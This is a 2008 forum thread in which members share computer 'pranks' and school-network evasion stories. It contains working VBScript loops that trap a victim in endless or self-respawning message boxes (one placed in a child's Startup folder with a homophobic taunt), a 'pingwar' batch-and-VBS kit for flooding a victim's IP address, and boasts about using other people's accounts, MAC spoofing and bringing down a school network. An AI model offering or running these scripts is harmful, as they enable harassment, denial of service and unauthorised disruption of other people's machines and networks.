Author Topic: Annoying thing I did to my bro  (Read 3043 times)

DarkMage2303

  • Global Moderators
  • Newbie
  • *
  • Posts: 41
    • View Profile
Annoying thing I did to my bro
« on: December 04, 2008, 11:09:27 PM »
In a .vbs file I put
Code: [Select]
Do
MsgBox "Daniel is gay!"
Loop

I also put it in his Startup folder so he had no idea how to quit off it because every time you press "Ok" or [X] it would make a new window (Daniel is 10)



I've also taken a screen shot of his desktop, with all his icons and set it as his wallpaper then deleted all his icons. He sat there for about 5 minutes clicking on his 'icons'.

Hero

  • Administrator
  • Hero Member
  • *****
  • Posts: 502
    • View Profile
    • http://rev7.net
Annoying thing I did to my bro
« Reply #1 on: December 05, 2008, 01:50:42 PM »
Code: [Select]
Do
  Set wshShell = WScript.CreateObject("WScript.Shell")
  Call wshShell.Run(WScript.ScriptFullName)
  MsgBox "Noob", vbOkOnly + vbSystemModal, "!!!!"
Loop
I ran that  on a school computer then walked away.

(It  opens a new instance  of itself)
(vbSystemModal == On top of everything always)
« Last Edit: December 05, 2008, 01:59:53 PM by Hero »
Hero
AKA: HeroAssasin and Mike
- - - - -  - - -
Visit Clan R77
- - - - -  - - -
Please do not PM me with random questions. That is what I made these forums for.

Noob ~Vector

DarkMage2303

  • Global Moderators
  • Newbie
  • *
  • Posts: 41
    • View Profile
Annoying thing I did to my bro
« Reply #2 on: December 05, 2008, 02:44:14 PM »
Haha, nice.

I can't do shit to my school computers, they have restrictions to everything. I have to use a shortcut to open up the Control Panel, cmd prompt is disabled, you can't change file extensions to stuff like .vbs:(.
« Last Edit: December 05, 2008, 02:44:33 PM by DarkMage2303 »

Hero

  • Administrator
  • Hero Member
  • *****
  • Posts: 502
    • View Profile
    • http://rev7.net
Annoying thing I did to my bro
« Reply #3 on: December 05, 2008, 03:03:48 PM »
Lawl, restrictions  don't stop teh hero!@
Hero
AKA: HeroAssasin and Mike
- - - - -  - - -
Visit Clan R77
- - - - -  - - -
Please do not PM me with random questions. That is what I made these forums for.

Noob ~Vector

ArticWolve

  • Global Moderators
  • Hero Member
  • *****
  • Posts: 636
    • View Profile
    • http://
Annoying thing I did to my bro
« Reply #4 on: December 05, 2008, 03:08:37 PM »
Rofl... they thought they could do that to me at mine. I forgot how I got around those restrictions though.........
Quote
Darker then the darkest shade of night...
    A Rebel at heart... A criminal by mind
    All in the eyes of the beholder... is the truth to life
    But Th---The Only---The One and Only True Master of Death is the Reaper itself
[/color]
[/color]
[div align=\'center\'][img]http://img261.imageshack.us/img261/9411/mydesktopce6.jpg\" border=\"0\" class=\"linked-sig-image\" /][img]http://www.danasoft.com/sig/238153.jpg\" border=\"0\" class=\"linked-sig-image\" /][/div]                     [div align=\'center\']    Click ME for my forums. You know you want to click ME. Come on CLICK ME DAMN IT! But don't click THIS!![/div]

Vector

  • Administrator
  • Hero Member
  • *****
  • Posts: 550
    • View Profile
    • http://clanmage.phost.ws
Annoying thing I did to my bro
« Reply #5 on: December 10, 2008, 12:31:22 PM »
pingwar.bat
Code: [Select]
  ping <Victim's IP goes here> -l 65500 -n 5000
pingstart.vbs
Code: [Select]
numTimes = Int(InputBox("How many instances of ping war do you want to run?", "Vector's PingWar"))
Set wsh = CreateObject("Wscript.Shell")

For i=0 to numTimes - 1
  wsh.Run("start pingwar.bat")
Next

Save them in the same place.
I am an Unofficial StealthBot Technician, an Unofficial StealthBot scripter, among other things. See my about page for more info.

Quote from: ArticWolve
Sorry I went down. Had internet problems with a cracker-jack-licensed driver hitting my internet pole (about 8 of them fell) and drooping my phone and electricity. Sorry ><

Rev77.net Plugins Manager

Proud host of Vector.no-ip.info | VectorJBLS.no-ip.org Status: [img]http://rev77.net/ServerCheck/check.asp?query=check&server=VectorJBLS.no-ip.org_status.png\" border=\"0\" class=\"linked-image\" /]

Shito-Ryu Karate-Do Genbu-Kai Rank: 8th Kyu (White belt, one stripe)

Rev77.Net Remote Support (Double-Click my name only if you were told to)

If the above link doesn't work, or if you use Vista, try this alternate link.

Noob ~Vector

riffruff

  • Sr. Members
  • Jr. Member
  • **
  • Posts: 94
    • View Profile
Annoying thing I did to my bro
« Reply #6 on: December 10, 2008, 01:35:56 PM »
Quote from: Hero
Lawl, restrictions  don't stop teh hero!@
At my school they log everything -- so I wouldn't even attempt it.
I got onto the server in my Freshman year, and found the log files...I don't do anything that could get me in trouble on the computers now..

Reason

  • Global Moderators
  • Full Member
  • ***
  • Posts: 193
    • View Profile
    • http://Rev77.net/FailBot/latest.zip
Annoying thing I did to my bro
« Reply #7 on: December 10, 2008, 02:46:46 PM »
Same here. At my comp, the computer people actually watch what you doing. They have keyloggers and shit. Also, the librarian freaked out when i started coding in HTML lol. it was hilarious.
Quote
04:37:18 PM | ?Swamp_Demon15@Azeroth? make me 1..?
04:37:28 PM | ?MikeA@Azeroth? can you code in VB6, lol?
04:37:47 PM | ?MikeA@Azeroth? And do you know how to have sex while hanging from your little toe?
04:38:01 PM | ?MikeA@Azeroth? If no to either, I'm sorry, we can't take you.
04:38:11 PM | ?MikeA@Azeroth? Joel taught us all the second one.

Hero

  • Administrator
  • Hero Member
  • *****
  • Posts: 502
    • View Profile
    • http://rev7.net
Annoying thing I did to my bro
« Reply #8 on: December 10, 2008, 03:54:33 PM »
They do all that at my school, but I don't use my own account.
Hero
AKA: HeroAssasin and Mike
- - - - -  - - -
Visit Clan R77
- - - - -  - - -
Please do not PM me with random questions. That is what I made these forums for.

Noob ~Vector

Vector

  • Administrator
  • Hero Member
  • *****
  • Posts: 550
    • View Profile
    • http://clanmage.phost.ws
Annoying thing I did to my bro
« Reply #9 on: December 10, 2008, 03:55:32 PM »
NetOps FTW.

About the strongest type is administration over computer use can be maintaned by using that program.
I am an Unofficial StealthBot Technician, an Unofficial StealthBot scripter, among other things. See my about page for more info.

Quote from: ArticWolve
Sorry I went down. Had internet problems with a cracker-jack-licensed driver hitting my internet pole (about 8 of them fell) and drooping my phone and electricity. Sorry ><

Rev77.net Plugins Manager

Proud host of Vector.no-ip.info | VectorJBLS.no-ip.org Status: [img]http://rev77.net/ServerCheck/check.asp?query=check&server=VectorJBLS.no-ip.org_status.png\" border=\"0\" class=\"linked-image\" /]

Shito-Ryu Karate-Do Genbu-Kai Rank: 8th Kyu (White belt, one stripe)

Rev77.Net Remote Support (Double-Click my name only if you were told to)

If the above link doesn't work, or if you use Vista, try this alternate link.

Noob ~Vector

Reason

  • Global Moderators
  • Full Member
  • ***
  • Posts: 193
    • View Profile
    • http://Rev77.net/FailBot/latest.zip
Annoying thing I did to my bro
« Reply #10 on: December 11, 2008, 05:53:50 AM »
Oh wow. Thats pretty beast,

Lets you block internet
Close Ports
Approve and Deny certain programs
Shutdown, Restart, and Log off users
Lock students computers.
and this is just some of them lol theres like a shitload
Quote
04:37:18 PM | ?Swamp_Demon15@Azeroth? make me 1..?
04:37:28 PM | ?MikeA@Azeroth? can you code in VB6, lol?
04:37:47 PM | ?MikeA@Azeroth? And do you know how to have sex while hanging from your little toe?
04:38:01 PM | ?MikeA@Azeroth? If no to either, I'm sorry, we can't take you.
04:38:11 PM | ?MikeA@Azeroth? Joel taught us all the second one.

ArticWolve

  • Global Moderators
  • Hero Member
  • *****
  • Posts: 636
    • View Profile
    • http://
Annoying thing I did to my bro
« Reply #11 on: December 11, 2008, 07:16:01 AM »
Please.... I took a laptop to my school and sat right next to the computer teacher. I actually SHOWED HIM how to get around the blocks >< (Don't ask me how cause its my dirty little secret). Afterwords, I was allowed to use my own laptop for anything I wanted (Cause I did it on the schools computer too). I also became their little pet when they needed something, even though I did everything unconventionally. LOL
Quote
Darker then the darkest shade of night...
    A Rebel at heart... A criminal by mind
    All in the eyes of the beholder... is the truth to life
    But Th---The Only---The One and Only True Master of Death is the Reaper itself
[/color]
[/color]
[div align=\'center\'][img]http://img261.imageshack.us/img261/9411/mydesktopce6.jpg\" border=\"0\" class=\"linked-sig-image\" /][img]http://www.danasoft.com/sig/238153.jpg\" border=\"0\" class=\"linked-sig-image\" /][/div]                     [div align=\'center\']    Click ME for my forums. You know you want to click ME. Come on CLICK ME DAMN IT! But don't click THIS!![/div]

riffruff

  • Sr. Members
  • Jr. Member
  • **
  • Posts: 94
    • View Profile
Annoying thing I did to my bro
« Reply #12 on: December 11, 2008, 12:43:25 PM »
Quote from: Shadow
Please.... I took a laptop to my school and sat right next to the computer teacher. I actually SHOWED HIM how to get around the blocks >< (Don't ask me how cause its my dirty little secret). Afterwords, I was allowed to use my own laptop for anything I wanted (Cause I did it on the schools computer too). I also became their little pet when they needed something, even though I did everything unconventionally. LOL
At my school, you can't get on the network if you bring it a laptop -- it won't let you.
 
 We've booted up Ubuntu in one of my computer classes, and the network wouldn't allow us to do anything.  These were live CDs, so it's not like the school installed something on the computers to prevent us from getting on the network.

ArticWolve

  • Global Moderators
  • Hero Member
  • *****
  • Posts: 636
    • View Profile
    • http://
Annoying thing I did to my bro
« Reply #13 on: December 11, 2008, 12:59:45 PM »
Hahaha my school thought the same thing. Too bad I got around that somehow, yet I don't quite remember what I did exactly.
Quote
Darker then the darkest shade of night...
    A Rebel at heart... A criminal by mind
    All in the eyes of the beholder... is the truth to life
    But Th---The Only---The One and Only True Master of Death is the Reaper itself
[/color]
[/color]
[div align=\'center\'][img]http://img261.imageshack.us/img261/9411/mydesktopce6.jpg\" border=\"0\" class=\"linked-sig-image\" /][img]http://www.danasoft.com/sig/238153.jpg\" border=\"0\" class=\"linked-sig-image\" /][/div]                     [div align=\'center\']    Click ME for my forums. You know you want to click ME. Come on CLICK ME DAMN IT! But don't click THIS!![/div]

Vector

  • Administrator
  • Hero Member
  • *****
  • Posts: 550
    • View Profile
    • http://clanmage.phost.ws
Annoying thing I did to my bro
« Reply #14 on: December 11, 2008, 09:50:36 PM »
At my school you had to register your MAC address in order to get access to the network. For some reason, you could get passed that block by spoofing your MAC address (only possible with some network adapters).

One person in my old highschool once took down the network by spoofing the gateway (Using EtheReal).

It was fun.
I am an Unofficial StealthBot Technician, an Unofficial StealthBot scripter, among other things. See my about page for more info.

Quote from: ArticWolve
Sorry I went down. Had internet problems with a cracker-jack-licensed driver hitting my internet pole (about 8 of them fell) and drooping my phone and electricity. Sorry ><

Rev77.net Plugins Manager

Proud host of Vector.no-ip.info | VectorJBLS.no-ip.org Status: [img]http://rev77.net/ServerCheck/check.asp?query=check&server=VectorJBLS.no-ip.org_status.png\" border=\"0\" class=\"linked-image\" /]

Shito-Ryu Karate-Do Genbu-Kai Rank: 8th Kyu (White belt, one stripe)

Rev77.Net Remote Support (Double-Click my name only if you were told to)

If the above link doesn't work, or if you use Vista, try this alternate link.

Noob ~Vector